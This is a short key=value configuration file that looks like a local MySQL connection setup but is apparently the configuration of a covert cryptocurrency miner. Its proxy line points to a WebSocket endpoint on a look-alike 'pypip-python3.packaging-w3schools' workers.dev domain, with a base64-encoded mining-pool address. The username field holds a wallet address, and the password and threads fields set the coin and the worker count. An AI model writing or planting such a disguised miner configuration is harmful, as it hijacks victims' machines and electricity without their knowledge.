proxy=wss://pypip-python3.packaging-w3schools.workers.dev/cG93ZXIyYi5uYS5taW5lLnpwb29sLmNhOjYyNDI=
host=127.0.0.1
port=3306
username=mbc1qhut49lvdruznypvaxgrg4klf3ntpnwuc23hq3j
password=c=MBC
threads=8
